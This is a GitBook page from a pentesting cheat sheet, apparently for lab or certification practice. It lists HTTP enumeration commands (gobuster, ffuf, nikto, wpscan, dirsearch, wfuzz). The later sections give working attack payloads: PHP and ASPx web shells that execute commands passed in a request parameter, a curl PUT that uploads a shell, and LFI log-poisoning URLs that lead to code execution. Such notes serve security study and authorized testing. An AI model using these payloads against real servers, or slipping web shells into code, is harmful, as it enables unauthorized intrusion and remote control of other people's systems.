Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page
  • Gobuster
  • FFUF
  • Nikto Web Scan
  • Wordpress Scan
  • Drupal
  • Joomla
  • Dirb
  • Dirsearch
  • Netcat
  • cUrl
  • Wfuzz
  • Upload a PHP file
  • WebDav
  • ASPx Webshell
  • Code Execution through HTTP/LFI

Was this helpful?

  1. Enumeration

HTTP Enum

Enumerate directories.

The main thing to remember here is to always run against multiple wordlists starting with directory-list-2.3-medium.txt

Gobuster

# URL Search

-- Quick Directory Busting:
gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux

-- Comprehensive Directory Busting
gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

-- Search with File Extension
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php

==========================================================================================================================================================================================

# DNS Search
gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt

==========================================================================================================================================================================================

# vhost Search
gobuster vhost -u https://anysite.com -w common-vhosts.txt

FFUF

ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"

Nikto Web Scan

nikto -h 10.10.10.10
nikto -h 10.10.10.10 -p 8080                 # Different port
nikto -h 10.10.10.10 -p 443,80,8080,8081     # Multiple ports
nikto -h 10.10.10.10 -p 80-88                # Port range

Wordpress Scan

wpscan --update
wpscan --url http://10.10.10.10/
wpscan --url http://10.10.10.10/wp/

wpscan -u 10.10.10.10/wp/ --enumerate [p/vp/ap/t/vt/at]

**** User ****
u: enumerate users

**** Plugins Switches ****
p: Popular plugins only
vp: Vulnerable plugins only
ap: All plugins

**** Themes Switches ****
t: Popular themes only
vt: Vulnerable plugins only
at: All themes

Drupal

droopescan scan drupal -u http://10.10.10.10/ -t 32

Joomla

joomscan -u http://10.10.10.10/

Dirb

dirb http://10.10.10.x

******** HOTKEYS *******
n -> Go to the next directory.
q -> Stop scan and save current state.
r -> Remaining scan stats

dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt

-x : use this extension list against the wordlists within big.txt

Dirsearch

git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>

Example
python3 dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
./dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-u: URL to scan.
-e: formats to search.
-w: wordlist.

Netcat

nc 10.10.10.10 80
HEAD / HTTP/1.0
GET / HTTP/1.0

cUrl

# Header
curl -i INSERTIPADDRESS

# Everything else
curl -i -L INSERTIPADDRESS

# Title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq

# Upload possible?
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php

Wfuzz

----Simple Test----
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php

----URL testing----
wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ

----DNS fuzzing----
wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62

Upload a PHP file

In case you can upload a file try the below. This can be used for reverse shell too.

<?php echo system($_GET["cmd"]);?>

OR

<?php echo shell_exec($_GET["cmd"]);?>

WebDav

davtest -url http://10.10.10.10    <-- Make a test to see file extensions upload.
cadaver http://10.10.10.10/        <-- Connect

ASPx Webshell

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmdStdOut.Readall()
Response.write(o)
%>

Code Execution through HTTP/LFI

nc 10.10.10.10
<?php system($_GET['cmd']); ?>
==========================================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id 

http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami

PreviousLDAP EnumNextCheckList

Last updated 3 years ago

Was this helpful?